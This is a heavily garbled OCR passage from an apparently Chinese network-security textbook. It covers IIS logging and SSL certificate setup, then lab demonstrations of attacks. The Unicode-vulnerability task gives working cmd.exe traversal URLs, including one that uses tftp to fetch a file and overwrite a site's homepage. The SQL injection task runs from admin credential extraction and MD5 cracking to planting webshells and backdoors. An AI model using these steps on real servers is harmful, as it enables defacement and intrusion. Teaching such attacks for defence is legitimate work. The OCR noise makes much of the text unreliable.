息 服 务 (IIS) 管 理 回 


YINSERVER ， 网 站 ，Defealt Web Site » 吧 


使 用 此 功能 限 置 TS 在 Wb 服务 器 上 记录 请 求 的 方式 。 
一 个 日 志文 件 /每 四) 


日 志文 件 
格式 9); 


a 
tenjrivexinetpab logs\Logiles 
TD 


日 志文 件 滚动 更 新 
选择 ITS 用 来 创建 新 的 日 志文 件 的 方法 * 
@ 计划 吕 ) 
每 天 
人 最 大 文件 大 小 停 节 ) C) 
ss 





人 不 @ 键 新 的 日 志文 件 中 


厂 i mn 





站 ,location path="Default Web Site”> 





10-23 “日 志 ” 界 面 


步骤 2: IIS 日 志文 件 默认 存放 在 %SystemDrive%\inetpub\logs\logfiles 文件 夹 中 ,在 
“目录 ”文本 框 中 输入 其 他 路 径 , 可 以 更 改 IIS 日 志 的 存放 路 径 。 
因为 日 志 是 系统 安全 策略 中 的 重要 环节 ,确保 日 志 的 安全 能 有 效 提高 系统 整体 安全 性 。 
为 了 保护 日 志 安 全 ,还 可 将 日 志 设 置 成 只 有 管理 员 才 能 访问 。 
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10.4.2 任务 2: 通过 SSL 访问 Web 服务 器 


1. 任务 目标 

(1) 了 解 SSL 的 工作 原理 。 

(2) 了 解数 字 证 书 的 申请 、 安 装 和 使 用 。 

(3) 掌握 在 Web 服务 器 和 客户 端 浏览 器 上 设置 SSL 的 方法 。 

2. 任务 内 容 

(1) CA 证 书 服务 器 的 安装 。 

(2) Web 服务 器 数字 证 书 的 申请 与 安装 。 

(3) SSL 的 设置 和 应 用 。 

3. 完成 任务 所 需 的 设备 和 软件 

安装 有 Windows Server 2008 操作 系统 的 计算 机 1 台 ,作为 Web 服务 器 和 客户 端 。 
4. 任务 实施 步骤 

1) CA 证 书 服务 器 的 安装 

在 安装 证 书 服务 之 前 ,不 必 先 安装 IIS ,安装 证 书 服务 时 会 自动 安装 IIS 的 相关 服务 。 


步骤 1: 选择 “开始 ”>“ 管 理工 具 ”>” 服务 器 管理 器 ”命令 ,打开 “服务 器 管理 器 "窗口 ， 


如 图 10-24 所 示 。 
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图 本 BD 查看 支 装 在 服务 器 上 角色 的 运行 杖 部 ， 以 及 添加 或 唱和 全 角 色 和 功能 * 
图 
加 多 存 从 














人 ^ 角色 摘要 角色 摘要 帮助 


四 角色 : 已 雪 装 0 个 民 17 个 ) 


风向 色 


你 上 次 Wai 时 间 : 今天 19:52 配置 刷新 








图 10-24 “服务 器 管理 器 ”窗口 


步骤 2: 在 左 侧 窗 格 中 选中 “角色 ”选项 ,在 右 侧 窗 格 中 单 击 “ 添 加 角色 "链接 ,打开 “添加 


角色 向 导 ” 对 话 框 ,如 图 10-25 所 示 。 


步骤 3: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 选 择 服务 器 角色 ”界面 ,选中 “Active Directory 证 书 


服务 ” 复 选 框 ,如 图 10-26 所 示 。 





步骤 4: 单 击 “ 下 一 步 ”按钮 ,出 现 “Active Directory 证 书 服务 简介 ”界面 ,如 图 10-27 


所 示 。 
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10-25 “添加 角色 向 导 ” 对 话 框 


口 Active Directory Rights Managenent Services 
口 Aetive Directory 联合 | 
口 hetive Directory 轻型 目录 服务 

tive Directory 域 服务 


10-26 “选择 服务 器 角色 ”界面 
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图 10-27 “Active Directory 证 书 服务 简介 ”界面 


步骤 5: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 选 择 角色 服务 ”界面 ,选中 “证 书 颁发 机 构 ”" 和 “证书 颁 
发 机 构 Web 注册 ” 复 选 框 ,在 弹出 的 “添加 角色 向 导 ” 对 话 框 中 ,要 求 添加 "Web 服务 器 
(IIS)” 和 “远程 服务 器 管理 工具 ”服务 , 单 击 * 添 加 所 需 的 角色 服务 "按钮 ,如 图 10-28 所 示 。 








图 10-28 “选择 角色 服务 "界面 
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所 示 。 





图 10-29 “指定 安装 类 型 "界面 


步骤 7: 单 击 “ 下 一 步 "按钮 ,出 现 “ 指 定 CA 类 型 界面 ,选中 * 根 CA” 单 选 按钮 ,如 图 10-30 
所 示 。 





图 10-30 “指定 CA 类 型 "界面 
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所 示 。 





图 10-31 “设置 私 钥 " 界 面 


步骤 9: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 为 CA 配置 加 密 ” 界 面 ,保留 默认 设置 不 变 ,如 图 10-32 
所 示 。 


be tee Fete 





图 10-32 “为 CA 配置 加 密 "界面 
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步骤 10: 单 击 * 下 一 步 ? 按 钮 ,出 现 * 配 置 CA 名 称 ” 界 面 ,保留 默认 的 CA 公用 名 称 
(WINSERVER-CA) ,如 图 10-33 所 示 。 








图 10-33 “配置 CA 名 称 ”界面 


步骤 11: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “ 设 置 有 效 期 "界面 ,保留 默认 的 5 年 有 效 期 ,如 图 10-34 
所 示 。 





图 10-34 “设置 有 效 期 "界面 
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步骤 12: 单 击 * 下 一 步 ?按钮 ,出现 “配置 证 书 数据 库 ? 界 面 ,保留 默认 的 证 书 数据 库 位 置 
和 证 书 数据 库 日 志 位 置 , 如 图 10-35 所 示 。 





ETETEB 





图 10-35 “配置 证 书 数据 库 ” 界 面 


步骤 13: 单 击 “ 下 一 步 ” 按 钮 ,出 现 “Web 服务 器 (IIS)” 界 面 。 
步骤 14: 单 击 " 下 一 步 ”按钮 ,出 现 “ 选 择 角色 服务 ”界面 ,保留 默认 设置 不 变 ,如 图 10-36 
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图 10-36 “选择 角色 服务 "界面 
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CNTINSERYER-CA 


CM systen32\CertLog 
C:\Windows\systen32\CertLog 


四 A Windows 系统 资源 管理 器 fSM) 以 及 它 如 何 帮 助 优化 CPV 使 用 情况 的 详细 信 


Yeb 属 务 骂 





图 10-37 “确认 安装 选择 界面 


步骤 16: 单 击 "安装 "按钮, 稍 后 会 出 现 “ 安 装 结果 ”界面 ,如 图 10-38 所 示 , 单 击 “ 关 闭 ” 
按钮 。 





10-38 “安装 结果 ”界面 


步骤 17: 选择 “开始 ”程序 ”管理 工具 ”Internet 信息 服务 (IIS) 管 理 器 ”命令 ， 
打开 “Internet 信息 服务 (IIS) 管 理 器 ”窗口 ,可 以 看 到 默认 的 Web 站 点 下 有 一 个 CertSrv 虚 
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拟 站 点 ,用 户 可 访问 该 虚拟 站 点 申请 证 书 和 下 载 证 书 。 

在 安装 了 证 书 服务 之 后 不 能 重新 命名 计算 机 ,也 不 能 将 计算 机 加 入 到 某 个 域 中 ,或 者 从 
某 个 域 中 删除 。 如 果 要 执行 这 类 操作 ,必须 从 该 计算 机 中 删除 证 书 服务 。 

2) Web 服务 器 数字 证 书 的 申请 与 安装 

(1) 生成 Web 服务 器 数字 证 书 申请 文件 ,步骤 如 下 。 

步骤 1: 选择 “开始 ”>“ 程 序 ”->“ 管 理工 具 ”>“Internet 信息 服务 (IIS) 管 理 器 ”命令 , 打 
开 “Internet 信息 服务 (IIS) 管 理 器 ”窗口 ,如 图 10-39 所 示 。 


ETTETIEITSTT SS 


OO [rm 


文件 FE) 视图 W 帮助 00 












































图 10-39 “Internet 信息 服务 (IIS) 管 理 器 "窗口 


步骤 2: 在 左 侧 窗 格 中 选中 服务 器 名 (WINSERVER) ,双击 中 央 窗 格 IIS 区 域 中 的 “ 服 
务 器 证 书 ” 图 标 ,出 现 “ 服 务 器 证 书 ” 界 面 ,如 图 10-40 所 示 。 











人 服务 器 证 书 
的 





TISERVER-CA 





























图 10-40 “服务 器 证 书 界 面 
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步骤 3: 单 击 右 侧 窗 格 中 的 “创建 证 书 申请 ”链接 ,打开 “申请 证 书 ” 对 话 框 ,如 图 10-41 

所 示 , 填 写 相 关 文本 框 的 内 容 , 填 写 时 需要 注意 的 是 :“ 通 用 名 称 ”文本 框 中 必须 填写 本 计算 
机 的 IP 地 址 或 域名 ,其 他 项 则 可 以 根据 实际 情况 进行 填写 。 








92. 168. 10. 12 


eonputer 











图 10-41 “申请 证 书 ” 对 话 框 


步骤 4: 单 击 “ 下 一 步 ” 按 钮 出现“ 加密 服务 提供 程序 属性 ”界面 ,如 图 10-42 所 示 ,保留 
默认 设置 不 变 。 

















10-42 “加 密 服务 提供 程序 属性 ?界面 


步骤 5: 单 击 “ 下 一 步 ” 按 钮 .出 现 “ 文 件 名 ”界面 ,如 图 10-43 所 示 ,为 证 书 申请 指定 一 个 
文件 名 ,如 C:\certreq. txt, 此 文件 后 期 将 会 被 使 用 。 单 击 “ 完 成 ”按钮 。 
步骤 6: 打开 证 书 申请 文件 C:\certreq. txt, 加密 后 的 证 书 申请 文件 内 容 如 图 10-44 
所 示 。 
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10-43 “文件 名 ”界面 











图 10-44 加 密 后 的 证 书 申请 文件 内 容 


(2) 申请 Web 服务 器 数字 证 书 。 首 先 应 禁用 Windows Server 2008 中 增强 的 正 设置 ， 
因为 增强 的 IE 设置 会 影响 申请 数字 证 书 。 

步骤 1: 在 “服务 器 管理 器 "窗口 中 ,选择 左 侧 窗 格 中 的 “服务 器 管理 器 ”节点 ,在 右 侧 窗 
格 中 找到 并 单 击 “配置 IE Esc” 链 接 , 如 图 10-45 所 示 。 

步骤 2: 在 打开 的 “Internet Explorer 增强 的 安全 配置 ?对 话 框 中 ,将 管理 员 和 用 户 的 安 


全 配置 都 设置 为 “禁用 ”, 如 图 10-46 所 示 , 单 击 “ 确 定 ” 按 钮 。 
下 面 开 始 为 Web 服务 器 申请 数字 证 书 ,假设 服务 器 的 IP 地址 为 192. 168. 10. 12。 
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图 10-46 “Internet Explorer 增强 的 安全 配置 ?对 话 框 


步骤 3: 在 正 浏 览 器 中 访问 “http://192. 168. 10. 12/certsrv/ ”网址 ,其 中 192. 168. 10. 12 
为 CA 证 书 服务 器 的 IP 地 址 ,打开 “Microsoft Active Directory 证 书 服务 ”窗口 ,如 图 10-47 
所 示 。 
步骤 4: 单 击 窗口 底部 的 “申请 证 书 ” 链 接 ,出 现 “ 申 请 一 个 证 书 ” 界 面 ,如 图 10-48 
所 示 。 
步骤 5: 单 击 窗口 底部 的 “高 级 证 书 申请 "链接, 出现 “高 级 证 书 申请 ”界面 ,如 图 10-49 
所 示 。 
步骤 6: 单 击 窗口 底部 的 “使 用 base64 编码 的 CMC 或 PKCS #10 文件 提交 一 个 证 书 
申请 ,或 使 用 base64 编码 的 PKCS #7 文件 续 订 证 书 申请 ”链接 ,出 现 “ 提 交 一 个 证 书 申请 
或 续 订 申请 ”界面 ,如 图 10-50 所 示 。 
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Microse ive Directory 证 书 服 务 - Tindevs Internet Explerer lolxj 


SOM /em ll ol 





使 用 此 网 站 为 您 的 Web 浏览 器 、 电 子 邮件 客户 端 或 其 他 程序 申请 证 书 。 通 过 使 用 证 书 ， 您 可 
以 向 通过 Web 进行 通信 的 用 户 确认 您 的 身份 、 签 名 并 加 密 邮 件 ， 并 根据 您 申请 的 证 书 类 型 执 
行 其 他 安全 任务 。 


您 也 可 以 使 用 此 网 站 下 载 证 书 颁发 机 构 (CA) 证 书 、 证 书 链 ,或 证 书 刷 销 列表 (CRL) ,或 者 查看 挂 
起 申请 的 状态 。 


有 关 Active Directory 证 书 服务 的 详细 信息 ， 请 参阅 Active Directory 证 书 服务 文档 . 





图 10-47 “Microsoft Active Directory 证 书 服务 ”窗口 


Nicrosoft Active Directory 证 书 服务 - VWindews Internet Explerer 


OOM em sll [oh 
号 | 有 








图 10-48 “申请 一 个 证 书 ” 界 面 














图 10-49 “高 级 证 书 申请 ”界面 
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oft Active Directery 证 书 服务 - Windows Internet Exple ‘=I9| x] 


TE | 





要 提交 一 个 保存 的 申请 到 CA， 在 “保存 的 申请 ” 框 中 粘贴 一 个 由 外 部 源 (如 Web 服务 器 ) 生 成 
的 base-64 编码 的 CMC 或 PKCS #10 证 书 申请 或 PKCS #7 续 订 申请 . 








图 10-50 “提交 一 个 证 书 申请 或 续 订 申 请 ”界面 


步骤 7: 将 证 书 申请 文件 C:\certreq. txt 中 加 密 的 全 部 文本 内 容 复 制 到 “保存 的 申请 ” 
文本 框 中 ,再 单 击 界面 底部 的 “提交 ”按钮 ,出 现 如 图 10-51 所 示 的 “证 书 正在 挂 起 ”界面 ,这 
表明 申请 已 经 提交 给 证 书 服务 器 ,然后 关闭 当前 的 下 浏览 器 。 


证 书 正在 挂 起 


您 的 证 书 申请 已 经 收 到 。 但 是 ， 您 必须 等 待 管理 员 颁 发 您 申请 的 证 书 。 
您 的 申请 ID 为 2。 

请 在 一 天 或 两 天 内 返回 此 网 站 以 检索 您 的 证 书 。 

注意 : 您 必须 用 此 Web 浏览 器 在 10 天 内 返回 才能 检索 您 的 证 书 





图 10-51 “证 书 正在 挂 起 ”界面 


(3) 颁发 Web 服务 器 数字 证 书 , 步 又 如 下 。 
步骤 1: 选择 “开始 ”>“ 管 理工 具 ”>“ 证 书 颁发 机 构 ” 命 令 , 打 开 “ 证 书 颁发 机 构 ” 窗 口 。 
步骤 2: 在 左 侧 窗 格 中 ,选择 WINSERVER-CA 节点 中 的 “ 挂 起 的 申请 ”选项 , 右 击 右 侧 
窗 格 中 的 需 颁发 的 证 书 申请 ,在 弹出 的 快捷 菜单 中 选择 “所 有 任务 ”>“ 颁 发 "命令 ,如 图 10-52 
所 示 。 
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图 10-52 ”颁发 数字 证 书 


(4) 获取 Web 服务 器 数字 证 书 , 步 又 如 下 。 

步骤 1: 在 焉 浏览 器 中 再 次 访问 “http://192. 168. 10. 12/certsrv/” 网 址 ,出 现 如 图 10-47 
所 示 的 “Microsoft Active Directory 证 书 服务 ”窗口 。 

步骤 2: 单 击 “ 查 看 挂 起 的 证 书 申请 的 状态 ”链接 ,出 现 “ 查 看 挂 起 的 证 书 申请 的 状态 ” 界 
面 ,如 图 10-53 所 示 。 


有 erosoft Active Directory 证 书 服 务 ~- Vindows Internet Explerer 
So 
- | 次 召 e 


Broot Mm Direct EHR | | 


查看 挂 起 的 证 书 申请 的 状态 


请 选择 您 要 查看 的 证 书 申请 : 
保 在 的 申请 证 书 (2016 年 8 月 209 20:08:31) 





图 10-53 “查看 挂 起 的 证 书 申请 的 状态 界面 
步骤 3: 单 击 “ 保 存 的 申请 证 书 ” 链 接 , 出 现 “ 证 书 已 颁发 "界面 ,如 图 10-54 所 示 。 


lelzxl 


ko ol 


您 申请 的 证 书 已 颁发 给 您 。 
GDER 编码 或 C Base 64 编码 








图 10-54 “证 书 已 颁发 "界面 
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步骤 4: 单 击 * 下 载 证 书 ” 链 接 ,将 数字 证 书 保存 到 本 机 上 ,默认 的 数字 证 书 文件 为 
certnew. cer。 

(5) 安装 Web 服务 器 数字 证 书 ,步骤 如 下 。 

步骤 1: 再 次 打开 “Internet 信息 服务 (IIS) 管 理 器 "窗口 中 的 “服务 器 证 书 ” 界 面 ,如 
图 10-40 所 示 。 

步骤 2: 单 击 右 侧 窗 格 中 的 “完成 证 书 申请 ”链接 ,打开 “指定 证 书 颁发 机 构 响 应 ”对 话 
框 ,如 图 10-55 所 示 。 在 “包含 证 书 颁发 机 构 响 应 的 文件 名 ”文本 框 中 输入 刚 保 存 的 数字 证 
书 文件 名 ,如 C:\certnew. cer; 在 “好 记名 称 ”文本 框 中 输入 自 定义 的 名 称 , 如 “Web 证 书 ”。 


完成 证 书 申请 








司 
rm 











图 10-55 “指定 证 书 颁发 机 构 响 应 ”对 话 框 


步骤 3: 单 击 “ 确 定 ” 按 钮 ,可 在 “服务 器 证 书 ” 界 面 中 看 到 “Web 证 书 ” 如 图 10-56 
所 示 。 





og 服务 器 证 书 
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昌国 网 站 
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图 10-56 “服务 器 证 书 ” 界 面 
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3) SSL 的 设置 和 应 用 

步骤 1: 在 图 10-56 中 ,选中 左 侧 窗 格 中 的 Default Web Site 节点 , 单 击 右 侧 窗 格 中 的 
“ 绑 定 ”链接 ,打开 * 网 站 绑 定 对话 框 ,默认 会 出 现 一 个 类 型 为 http .端口 为 80 的 网 站 绑 定 。 

步骤 2: 单 击 “ 添 加 ”按钮 ,打开 “添加 网 站 绑 定 ”对 话 框 ,选择 一 条 类 型 为 https\IP 地 址 
为 192. 168. 10.12、 端 口 为 443、SSL 证 书 为 “Web 证 书 ” 的 网 站 绑 定 , 如 图 10-57 所 示 , 单 击 
“确定 ”按钮 后 ,会 看 到 * 网 站 绑 定 ”对话 框 中 添加 了 一 条 类 型 为 https 的 网 站 绑 定 , 单 击 “ 关 
闭 ” 按 钮 。 


3 @ ，msmmm » Pl » Defwlt rob site » 加 


系 加 网 站 纪 定 


sw | 777 | | 





图 10-57 ”网 站 绑 定 
步骤 3: 双击 中 央 窗 格 IIS 区 域 中 的 “SSL 设置 ”图标 ,出 现 “SSL 设置 ?界面 ,如 图 10-58 





息 服务 CTS) 管 理 回 


TNSERVER » 网 站 » Defuult Web Site » 5 





config , location Path= "Default Web Site”> 


图 10-58 “SSL 设置 ?界面 
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步骤 4: 选中 “要 求 SSL” 复 选 框 和 “忽略 ” 单 选 按钮 , 单 击 右 侧 窗 格 中 的 “应 用 ”链接 。 
步骤 5: 在 IE 浏览 器 中 访问 http://192. 168. 10. 12 网 址 ,出 现 如 图 10-59 所 示 的 
HTTP 错误 页 面 。 


IIS 7.5 详 田 错误 - 403.4 - Forbidden 一 Windo 


EEC gy 
SO/ lllx::: | 

穴 收 二 天 | 汪 六 WS 。 忆 FI 讯 庄 - 
逢 Ts 1.5 详细 樟 误 - 403.4 - Porbidden 价 - 国 - 乙 二 ”页 0)， 支 人 5)， 工具 0)- 各- 


应 用 程序 “DEFAULT WEB SITE” 中 的 服务 器 错误 














Internet Information Services 7.5 


错误 摘要 
HTTP 错误 403.4 - Forbidden 
您 尝试 访问 的 页 面 受到 安全 套 接 字 层 (SSL) 的 保护 。 








详细 错误 信息 


模块 TS Web Core 请 求 的 URLhttp://192.168.10.12:80/ 
通知 BeginRequest 御 理 路 径 CNVinetpub \wwwroot 
登录 方法 尚未 确定 





处 理 程序 StaticFile 
错误 代码 0x80070005 登录 用 户 尚未 确定 








图 10-59 HTTP 错误 页 面 


步骤 6: 通过 SSL 连接 实现 安全 访问 , URL 网 址 必须 是 以 https 开头 ,在 IE 浏览 器 中 


访问 https://192.168.10.12 网 址 ,此 时 会 出 现 有 ”IIS7? 字 样 的 页 面 , 如 图 10-60 所 示 , 这 说 
明 SSL 配置 已 成 功 。 


[ESOETZETTTTTITTCTTSSSSSS -lolxl 
SO emo 可 alsolxi | 
宝 业 可 赤 | 认 如 建站 ”已 ] 网 快讯 库 = 


PP 从 - 国 - 本 入” 页面 中 ”安全 6) IO- 番 - 


[IS 


internet information services 


> 








Mp /ee eicrosott ca/Gaiay | | | [ | [网 twnet | 保护 模式 - 要 有 EEC 


图 10-60 SSL 配置 已 成 功 
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说 明 普通 Web 访问 采用 http 协议 ,启用 SSL 后 的 安全 Web 访问 采用 https 协议 。 
10.4.3 任务 3: 利用 Unicode 漏洞 实现 网 页 “涂鸦 ”的 演示 


1. 任务 目标 

(1) 了 解 Unicode 漏洞 的 危害 性 。 

(2) 了 解 Unicode 漏洞 的 攻击 方法 。 

2. 任务 内 容 

(1) 准备 标语 。 

(2) 探知 远程 Web 服务 器 的 Web 根 目录 。 

(3) 上 传 覆盖 Web 主页 文件 。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 2000 Server 操作 系统 的 计算 机 1 台 ( 存 在 Unicode 漏洞 ) ,作为 
Web 服务 器 。 

(2) 安装 有 Windows 7 操作 系统 的 计算 机 1 台 ,作为 客户 端 。 

(3) TFTP 服务 器 软件 1 套 。 

4. 任务 实施 步骤 

以 下 假设 Windows 2000 Server 计算 机 的 IP 地 址 为 192. 168. 10. 14 ,并 已 开启 IIS 服 
务 ,作为 远程 Web 服务 器 。 假 设 客户 端 计算 机 的 IP 地 址 为 192. 168. 10. 11 。 

1) 准备 标语 

在 客户 端 计算 机 上 用 网 页 设计 软件 制作 一 个 标语 网 页 ,保存 为 1. htm, 作 为 “涂鸦 ” 主 
页 ,内 容 任意 。 

2) 探知 远程 Web 服务 器 的 Web 根 目录 

首先 查找 要 修改 的 Web 服务 器 上 的 主页 文件 保存 在 哪里 。 利 用 Unicode 漏洞 找 出 
Web 根 目录 的 路 径 。 用 查找 文件 的 方法 找到 远程 Web 服务 器 的 Web 根 目录 。 

步骤 1: 在 客户 端 I 下 浏览 器 中 输入 “http://192. 168. 10. 14/scripts/.. %c0%2f../ 
windows/system32/cmd. exe? /c 十 dir 十 c:\mmec. gif/s”。 

其 中 的 “十 ”表示 空格 ,“/s" 参 数 加 在 dir 命令 后 表示 查找 指定 文件 或 文件 夹 的 物理 路 
径 , 所 以 “dir 十 c:\mme. gif/s” 表 示 在 远程 Web 服务 器 的 C 盘 中 查找 mmc. gif 文件 。 由 于 
文件 mmc. gif 默认 安装 在 Web 根 目录 中 ,所 以 在 找到 该 文件 的 同时 ,也 就 找到 了 Web 根 目 
录 (c:\Inetpub\wwwroot) ,如 图 10-61 所 示 。 

步骤 2: 在 客户 端正 地 址 栏 中 输入 “http://192. 168. 10. 14/scripts/.. %c0%2f{../ 
windows/system32/cmd. exe? /c 十 dir 十 c:\inetpub\wwwroot”, 图 10-62 显示 了 Web 根 目 
录 (c:\inetpub\wwwroot) 中 的 文件 和 文件 夹 。 

通常 主页 的 文件 名 一 般 是 index. htm index. html, default. asp、 default. htm 等 , 由 
图 10-62 可 知 , 远 程 Web 服务 器 的 主页 文件 是 index. htm。 因 此 ,此 时 只 需要 将 标语 文件 
1. htm 上 传 到 远程 Web 服务 器 的 Web 根 目录 下 覆盖 掉 index. htm 文件 就 可 以 了 。 

3) 上 传 覆盖 Web 主页 文件 

步骤 1: 在 客户 端 运行 TFTP 服务 器 软件 (Tftpd32. exe) ,此 时 不 需要 做 任何 设置 ,只 要 
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Se A 
rr 
sie A | 


1909-06-03 23:13 356 mmc. gif 


1 File(s) ome 
Directory of :+\Inetpub\eroct\ vti_enf 


2012-04-06 09:58 344 mac. gif 
1 File(s) 344 byte: 


Te 


DB ow0, ss 2 WE: gee 





图 10-61 查找 Web 根 目录 的 路 径 


| mere21810 aceriptsy meosa windows/syetemaJemd ver/et dichinetpsb nont D BO XK 0 
[em “上 


Directary of csvinerpubvmmmroor 
ht 


om 0 
23, 397 byres 
oa 





图 10-62 Web 根 目录 中 的 文件 和 文件 夹 


把 1. htm 文件 复制 到 TFTP 服务 器 的 路 径 下 即 可 。 下 面 通过 tftp 命令 将 1. htm 文件 下 载 
到 远程 Web 服务 器 上 。 

步骤 2: 在 客户 端 正 地 址 栏 中 输入 “http://192. 168. 10. 14/scripts/.. %c0% 2f../ 
windows/system32/cmd. exe? /c 十 tftp 十 192. 168. 10. 11 二 get 十 1. htm 二 c:\inetpub\ 
wwwroot\index. htm”, 表 示 执 行 tftp 命令 来 覆盖 远程 Web 服务 器 上 的 主页 文件 ,结果 如 
图 10-63 所 示 ,出 现 CGI 错误 的 提示 ,其 实 已 经 完成 了 下 载 文件 的 任务 。 


让 hp/102168 1014/ecripte/. see0e2. /windews/systema2/emd exer/e+thp+192.1621011+9et- PD ~ 加 OX | 0) 
[ee " 曾 


CGI Error 


The Set ed OSI application nishehaved by not Terurning a complere set of HTIP headers. The headers it 
did return 





10-63 上传 覆盖 主页 文件 


步骤 3: 重新 访问 远程 Web 网 站 , 即 在 客户 端正 地址 栏 中 输入 *http://192. 168. 10. 14”， 
即 可 看 到 刚才 下 载 到 Web 服务 器 上 的 标语 文件 ,如 图 10-64 所 示 ,“ 涂 鸦 ” 主 页 成 功 。 如 果 不 能 
出 现 如 图 10-64 所 示 的 结果 ,可 能 是 因为 没有 修改 权限 .添加 修改 权限 后 ,可 成 功 “ 涂 鸦 ” 主 页 。 
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spwmozataloaw Pp-OXBr 0 
[=== 


这 是 被 小 的 网 页 | 





图 10-64 “涂鸦 ”后 的 主页 


10.4.4 任务 4: 利用 SQL 注入 漏洞 实现 网 站 入 侵 的 演示 


1. 任务 目标 

(1) 了 解 SQL 注入 漏洞 的 危害 性 。 

(2) 了 解 SQL 注入 攻击 的 方法 。 

2. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7 操作 系统 的 计算 机 1 台 。 

(2) 存在 SQL 注入 漏洞 的 网 站 1 个 。 

(3) Domain 4. 3 综合 检测 程序 1 套 。 

(4) MD5 破解 工具 软件 1 套 。 

3. 任务 实施 步骤 

步 又 1: 下载 并 运行 Domain 4. 3 综合 检测 程序 ,选择 “SQL 注入 ”选项 卡 ,在 “批量 扫描 
注入 点 ”页 面 中 , 单 击 * 添 加 网 址 ”按钮 ,在 弹出 的 “添加 检测 网 址 ”对 话 框 中 添加 可 能 存在 
SQL 注入 漏洞 的 网 址 ,如 图 10-65 所 示 。 


se ASS 上 传 【SGEEA LI) 绿 管 凡 后 坝 WT 及 “ 轴 WuTA “多 六 SA | 
| 








图 10-65 ”添加 检测 网 址 
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步骤 2: 单 击 OK 按钮 后 ,再 单 击 * 批 量 分 析 注 和 人 点 ”按钮 ,扫描 出 该 网 站 的 所 有 注 和 人 
点 一 一 SQL 漏洞 ,如 图 10-66 所 示 。 





[hetp://rm url. om/xxx/list asp?id=123 [LE 





图 10-66 扫描 SQL 注入 点 


步骤 3: 右 击 图 10-66 中 的 某 个 注入 点 ,在 弹出 的 快捷 菜单 中 选择 “检测 注入 "命令 ,出 
现 “SQL 注入 猜 解 检测 "页面 。 选 中 Access 单 选 按钮 ,再 单 击 “ 开 始 检 测 ” 按 钮 ,检测 该 注入 
点 是 否 可 以 进行 注入 ,如 图 10-67 所 示 。 





图 10-67 检测 URL 是 否 可 以 注入 
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步骤 4: 如 果 该 URL 可 以 进行 注入 , 则 依次 单 击 “ 猜 解 表 名 ”和 猜 解 列 名 ”“ 猜 解 内 容 ” 按 
钮 进行 数据 库 表 名 、 列 名 和 字段 内 容 的 猜 解 ,如 图 10-68 所 示 。 





Ee 加 党 后 上 人 
志 蛙 扫 近 入 点 














SE vm 
个 EE 
























































图 10-68 猜 解 数据 库 的 表 名 、 列 名 和 字段 内 容 


步骤 5: 从 图 10-68 中 可 以 知道 , 表 Ameav_Admin 中 有 username 列 .adminname 列 和 
password 列 , 还 知道 admin 账号 (很 可 能 是 管理 员 的 账号 ) 的 密码 的 MD5 值 
为 5ae857adela0cae7 。 

步骤 6: 接 下 来 需要 找 出 该 网 站 的 管理 入口。 切换 到 “管理 入口 扫描 ?页面 , 单 击 “ 扫 描 
后 台地 址 ”按钮 ,可 以 得 到 如 图 10-69 所 示 的 网 站 管理 入口 地 址 。 





man 册 结 上 人 CE re 让 打工 具 【 则 钠 肌 具 “ 区 关于 程序 
所 时 和 如 和 和 点 。 st 入 表 角 习 到 。 wesatI 工 具 ”| 管理 呈 亲 晤 | 。 娘 i&RE 。。 流放 操 


| 
人 当前 下 录 开 必要 币 。 玉 从 主机 扒 直 到 要 办。 放置 二- 

es 
M/s i rio 
ee 
m/e 
Em Ee esp pb 
i:t Viayweile 
eth/ /or Ee ela 


























http-// I sre/ners ap 






































图 10-69 获取 网 站 的 管理 入 口 地 址 
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步骤 7: 可 以 通过 尝试 ,最 终 找 出 在 获取 的 地 址 中 到 底 哪 一 个 才 是 真正 的 网 站 管理 
地 址 。 

步骤 8: 最 后 ,要 破解 经 过 加 密 的 管理 员 账 号 admin 的 密码 。 可 以 通过 MD5 破解 工具 
( 详 见 5. 4. 1 小 节 的 内 容 ) 或 者 MD5 破解 网 站 来 实现 。 

步骤 9: 有 了 网 站 的 管理 入 口 地 址 和 管理 员 的 账号 、 密 码 之 后 , 即 可 登录 网 站 的 管理 页 
面 进行 管理 。 至 此 ,一 次 SQL 注入 成 功 。 

步骤 10: SQL 成 功 注入 后 ,可 以 通过 多 种 方式 对 Web 服务 器 进行 攻击 。 例 如 ,在 Web 
网 站 管理 中 找 出 ASP 上 传 的 漏洞 ,上 传 ASP 木马 和 Webshell 来 获取 服务 器 的 账户 和 密 
码 。 然 后 ,通过 远程 登录 进入 服务 器 ,并 在 服务 器 上 植 入 灰 铝 子 等 木马 程序 , 留 下 后 门 以 便 
下 次 进入 。 


105 拓展 提升 : 防范 网 络 钓鱼 


1. 什么 是 网 络 钓鱼 

网 络 钓鱼 (Phishing) 是 诈骗 者 利用 欺骗 性 的 电子 邮件 和 伪造 的 Web 站 点 (钓鱼 网 站 ) 
来 进行 网 络 诈 骗 活动 ,诱骗 访问 者 提供 一 些 私 人 信息 ,受骗 者 往往 会 泄露 自己 的 私人 资料 ， 
如 用 户 名 、 信 用 卡号 码 、 银 行 卡 账户 、 身 份 证 号 码 等 内 容 。 钓 鱼网 站 是 设置 一 个 以 假 乱 真 的 
假 网 站 ,欺骗 网 络 浏览 者 上 当 ,链接 进入 假冒 网 站 ,木马 程序 趁机 植 人 用 户 的 计算 机 。 

网 络 钓 鱼 一 词 ,是 由 “Fishing” 和 “Phone” 组 合 而 成 ,由 于 黑客 始祖 起 初 是 用 电话 作案 ， 
所 以 用 “Ph” 来 取代 *F”, 创 造 了 “Phishing”,Phishing 发 音 与 Fishing 相同 。“ 网 络 钓鱼 ”就 
其 本 身 来 说 , 称 不 上 是 一 种 独立 的 攻击 手段 ,更 多 的 只 是 诈骗 方法 ,就 像 现 实 社会 中 的 一 些 
诈骗 一 样 。 

曾 出 现 过 的 某 假冒 银行 网 站 ,网 址 为 http://www. lcbc. com. cn, 而 真正 的 银行 网 站 是 
http://www. icbc. com. cn, 犯 罪 分 子 利用 数字 1 和 字母 i 非 常 相 近 的 特点 企图 蒙蔽 粗心 的 
用 户 。 

2. 网 络 钓鱼 的 防范 

针对 网 络 钓鱼 的 威胁 ,主要 有 以 下 几 个 防范 技巧 。 

(1) 直接 输入 域名 ,避免 直接 点 击 不 法 分 子 提供 的 相似 域名 。 

(2) 不 要 打开 陌生 人 的 电子 邮件 ,这 很 有 可 能 是 别有用心 者 精心 营造 的 。 

